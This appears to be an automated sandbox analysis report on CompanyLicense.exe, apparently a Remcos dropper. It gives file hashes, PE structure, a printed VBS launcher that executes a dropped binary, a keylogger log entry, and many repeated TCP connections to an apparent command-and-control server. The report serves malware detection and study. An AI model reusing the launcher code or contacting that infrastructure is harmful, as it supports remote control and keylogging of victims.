                                    C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.vbs
                                    Process:C:\Users\user\Desktop\CompanyLicense.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):119
                                    Entropy (8bit):4.835449331887728
                                    Encrypted:false
                                    SSDEEP:3:jfF+m8nhvF3mRDt+kiE2J5xAIKQNNApUiMn:jFqhv9Iwkn23fJNN+Uvn
                                    MD5:3166A889BD35A61A06116E63BED83855
                                    SHA1:55C2B6B33B9B8DCED197373E2627F9679E29B1B9
                                    SHA-256:E107D87C8F8AACC01566C5A56A2A31EAC151D8A9226880D56E140DA33A76C77B
                                    SHA-512:74B3A0E140EB4AC10BF0326D61B16B97D884A7F3C31E48B9BE459D737456B2AA751A665F08D55163D6B940375B0BC1E1A9C292C099582C758328FD4BA53119BF
                                    Malicious:true
                                    Reputation:low
                                    Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\Arsenation\Internering2.exe")
                                    C:\Users\user\AppData\Roaming\remcos\logs.dat
                                    Process:C:\Users\user\Desktop\CompanyLicense.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):74
                                    Entropy (8bit):4.662420853767955
                                    Encrypted:false
                                    SSDEEP:3:ttUVXVrA4RXMRPHv31aeo:tmVBXqdHv3IP
                                    MD5:2788D81C1E91ADDC68FED1327ECA7812
                                    SHA1:EEFA17BC4A2DB2D655E9C42D31D51A8C2977BE99
                                    SHA-256:3C96343061BCFDF07B8AC699D4AB70BD04F64D71E3849850DC5BB368CA62583F
                                    SHA-512:271DB10D91EDC0910C80133F570FBEACC0BB51A0000290B1061AE3EA1BB3346CA92ADC5D8C6C35565D431A170BC7B1CDAA95B80A85BFC4D864D2093C887AB73C
                                    Malicious:true
                                    Reputation:low
                                    Preview: ..[2021/01/19 17:14:22 Offline Keylogger Started]....[ Program Manager ]..

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):5.50764794769054
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:CompanyLicense.exe
                                    File size:98304
                                    MD5:ace3e9fc3a2277aa4e72881c9f204642
                                    SHA1:50337a4aa52b65cac5fd2745c3fe7d88d503d00f
                                    SHA256:c6cf35735aff0eba459a6a1f4b65722ba08dfb0beed54b0df8e9be3ec3edba98
                                    SHA512:9220fe497f297ae1d86a13dd28fffc381a6945ac49cc2f3b904d605a193af00daaf18b6bc4f6e85d93f6a80b29d34dd56d7269bbc11b46d98319e571989e721f
                                    SSDEEP:768:8zNE6BYzwvWXallllllllllllllllllllllllllllllllllllllllllllllllllK:oE66zwuoPMvaB5DqinLdNW2XLnolNI8
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........I....................................Rich............................PE..L......T................. ...`...............0....@

                                    File Icon

                                    Icon Hash:0919914f4707077b

                                    Static PE Info

                                    General

                                    Entrypoint:0x401480
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                    DLL Characteristics:
                                    Time Stamp:0x54CDDCDF [Sun Feb 1 07:59:27 2015 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:cdaaae34b462dd94bb47458bdb1adef4

                                    Entrypoint Preview

                                    Instruction
                                    push 004028A8h
                                    call 00007F8E00E97DE3h
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    xor byte ptr [eax], al
                                    add byte ptr [eax], al
                                    inc eax
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [edx-13h], dl
                                    xchg eax, ebx
                                    inc edi
                                    ror byte ptr [esi-27h], 1
                                    inc ebx
                                    xchg eax, ecx

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x11dd40x28.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x150000x3e70.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x118.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x112700x12000False0.344957139757data5.50911753026IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                    .data0x130000x15980x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                    .rsrc0x150000x3e700x4000False0.405883789062data5.82018702814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountry
                                    RT_ICON0x151480x468GLS_BINARY_LSB_FIRST
                                    RT_ICON0x155b00x10a8data
                                    RT_ICON0x166580x25a8data
                                    RT_GROUP_ICON0x18c000x30data
                                    RT_VERSION0x18c300x240dataEnglishUnited States

                                    Imports

                                    DLLImport
                                    MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaVarTstEq, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaI2Str, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, _CIatan, __vbaStrMove, __vbaAryCopy, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                                    Version Infos

                                    DescriptionData
                                    Translation0x0409 0x04b0
                                    InternalNameSKULPTURUDSTILLING
                                    FileVersion1.00
                                    CompanyNameAbove
                                    ProductNameHypotrochoid9
                                    ProductVersion1.00
                                    OriginalFilenameSKULPTURUDSTILLING.exe

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 19, 2021 17:14:22.775369883 CET497312048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:22.824256897 CET204849731185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:23.335721016 CET497312048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:23.386931896 CET204849731185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:23.897774935 CET497312048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:23.946536064 CET204849731185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:24.052889109 CET497322048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:24.101716042 CET204849732185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:24.602783918 CET497322048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:24.651901007 CET204849732185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:25.152772903 CET497322048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:25.201525927 CET204849732185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:26.294280052 CET497332048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:26.342992067 CET204849733185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:26.843080044 CET497332048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:26.891758919 CET204849733185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:27.392011881 CET497332048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:27.440768957 CET204849733185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:27.531769037 CET497342048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:27.580243111 CET204849734185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:28.080979109 CET497342048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:28.129554987 CET204849734185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:28.633030891 CET497342048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:28.682029009 CET204849734185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:29.763509989 CET497372048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:29.814196110 CET204849737185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:30.314121962 CET497372048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:30.362899065 CET204849737185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:30.864197969 CET497372048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:30.913114071 CET204849737185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:31.000382900 CET497382048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:31.048955917 CET204849738185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:31.549484015 CET497382048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:31.599778891 CET204849738185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:32.101264000 CET497382048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:32.150471926 CET204849738185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:33.234987974 CET497402048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:33.283703089 CET204849740185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:33.784394026 CET497402048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:33.833317041 CET204849740185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:34.334399939 CET497402048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:34.383140087 CET204849740185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:34.476705074 CET497412048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:34.525707006 CET204849741185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:35.026490927 CET497412048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:35.075144053 CET204849741185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:35.577543974 CET497412048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:35.626167059 CET204849741185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:36.713778973 CET497422048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:36.762989044 CET204849742185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:37.263942003 CET497422048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:37.314929008 CET204849742185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:37.815968990 CET497422048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:37.864969015 CET204849742185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:38.009288073 CET497432048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:38.061501980 CET204849743185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:38.562872887 CET497432048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:38.613833904 CET204849743185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:39.116797924 CET497432048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:39.165838003 CET204849743185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:40.367436886 CET497452048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:40.416039944 CET204849745185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:40.915915966 CET497452048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:40.964520931 CET204849745185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:41.500976086 CET497452048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:41.549803019 CET204849745185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:41.671722889 CET497462048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:41.720578909 CET204849746185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:42.220014095 CET497462048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:42.268996954 CET204849746185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:42.770032883 CET497462048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:42.819853067 CET204849746185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:43.925137043 CET497492048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:43.973728895 CET204849749185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:44.476151943 CET497492048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:44.524817944 CET204849749185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:45.027292013 CET497492048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:45.076185942 CET204849749185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:45.175616026 CET497512048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:45.224422932 CET204849751185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:45.727181911 CET497512048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:45.775923014 CET204849751185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:46.276385069 CET497512048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:46.325015068 CET204849751185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:47.433749914 CET497542048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:47.482527018 CET204849754185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:48.001429081 CET497542048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:48.050291061 CET204849754185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:48.601537943 CET497542048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:48.649986029 CET204849754185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:48.744983912 CET497582048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:48.793597937 CET204849758185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:49.294563055 CET497582048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:49.345067024 CET204849758185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:49.849251032 CET497582048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:49.897691965 CET204849758185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:51.016201973 CET497652048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:51.064769030 CET204849765185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:51.565696955 CET497652048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:51.614520073 CET204849765185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:52.115725994 CET497652048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:52.164488077 CET204849765185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:52.258903980 CET497672048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:52.307518959 CET204849767185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:52.807760954 CET497672048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:52.856662989 CET204849767185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:53.356803894 CET497672048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:53.405333996 CET204849767185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:54.497534990 CET497702048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:54.547132969 CET204849770185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:55.048944950 CET497702048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:55.097676039 CET204849770185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:55.597475052 CET497702048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:55.646395922 CET204849770185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:55.748610020 CET497722048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:55.797532082 CET204849772185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:56.298048019 CET497722048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:56.346923113 CET204849772185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:56.847039938 CET497722048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:56.895661116 CET204849772185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:58.224054098 CET497742048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:58.272780895 CET204849774185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:58.772224903 CET497742048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:58.820642948 CET204849774185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:59.321289062 CET497742048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:59.370187998 CET204849774185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:14:59.573581934 CET497752048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:14:59.622335911 CET204849775185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:00.123552084 CET497752048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:00.172154903 CET204849775185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:00.673417091 CET497752048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:00.724555969 CET204849775185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:01.846451998 CET497762048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:01.895152092 CET204849776185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:02.396042109 CET497762048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:02.444703102 CET204849776185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:02.947238922 CET497762048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:02.995974064 CET204849776185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:03.096684933 CET497772048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:03.145226002 CET204849777185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:03.645567894 CET497772048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:03.694125891 CET204849777185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:04.195661068 CET497772048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:04.244359016 CET204849777185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:06.381602049 CET497812048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:06.430500031 CET204849781185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:06.932796955 CET497812048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:06.981322050 CET204849781185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:07.482904911 CET497812048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:07.531594038 CET204849781185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:07.621427059 CET497872048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:07.669972897 CET204849787185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:08.171976089 CET497872048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:08.221604109 CET204849787185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:08.723167896 CET497872048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:08.772187948 CET204849787185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:09.852056026 CET497882048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:09.902740002 CET204849788185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:10.405098915 CET497882048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:10.453794956 CET204849788185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:10.955327988 CET497882048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:11.004626989 CET204849788185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:11.098200083 CET497892048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:11.150202036 CET204849789185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:11.652141094 CET497892048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:11.701937914 CET204849789185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:12.205311060 CET497892048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:12.254204035 CET204849789185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:13.344268084 CET497912048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:13.394406080 CET204849791185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:13.895371914 CET497912048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:13.944315910 CET204849791185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:14.445408106 CET497912048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:14.494050980 CET204849791185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:14.598859072 CET497932048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:14.647566080 CET204849793185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:15.152508020 CET497932048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:15.201118946 CET204849793185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:15.705755949 CET497932048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:28.816891909 CET497962048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:28.865475893 CET204849796185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:29.366527081 CET497962048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:29.415103912 CET204849796185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:29.916553974 CET497962048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:29.965262890 CET204849796185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:30.077146053 CET497972048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:30.126117945 CET204849797185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:30.626650095 CET497972048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:30.675601959 CET204849797185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:31.178626060 CET497972048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:31.227519035 CET204849797185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:32.329123020 CET498002048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:32.377681971 CET204849800185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:32.878793001 CET498002048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:32.927510023 CET204849800185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:33.428754091 CET498002048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:33.477555990 CET204849800185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:33.565963984 CET498022048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:33.614444017 CET204849802185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:34.115859032 CET498022048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:34.164328098 CET204849802185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:34.665910959 CET498022048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:34.714492083 CET204849802185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:35.811852932 CET498042048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:35.860477924 CET204849804185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:36.361994028 CET498042048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:36.410567045 CET204849804185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:36.914000988 CET498042048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:36.963051081 CET204849804185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:37.074404955 CET498052048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:37.123290062 CET204849805185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:37.623876095 CET498052048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:37.673569918 CET204849805185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:38.175116062 CET498052048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:38.223603964 CET204849805185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:39.318526983 CET498072048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:39.367028952 CET204849807185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:39.869663000 CET498072048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:39.918488979 CET204849807185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:40.419255018 CET498072048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:40.467592955 CET204849807185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:40.547131062 CET498092048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:40.595822096 CET204849809185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:41.096285105 CET498092048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:41.145519972 CET204849809185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:41.646441936 CET498092048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:41.698337078 CET204849809185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:42.793126106 CET498102048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:42.842196941 CET204849810185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:43.343494892 CET498102048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:43.392118931 CET204849810185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:43.893548012 CET498102048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:43.942442894 CET204849810185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:44.038311958 CET498112048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:44.086797953 CET204849811185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:44.589669943 CET498112048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:44.638458014 CET204849811185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:45.138654947 CET498112048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:45.187437057 CET204849811185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:46.288197041 CET498122048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:46.336991072 CET204849812185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:46.836740017 CET498122048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:46.885701895 CET204849812185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:47.386907101 CET498122048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:47.435523033 CET204849812185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:47.547933102 CET498132048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:47.596868038 CET204849813185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:48.099875927 CET498132048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:48.148515940 CET204849813185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:48.654910088 CET498132048192.168.2.4185.140.53.253
                                    Jan 19, 2021 17:15:48.703871012 CET204849813185.140.53.253192.168.2.4
                                    Jan 19, 2021 17:15:50.545908928 CET498142048192.168.2.4185.140.53.253
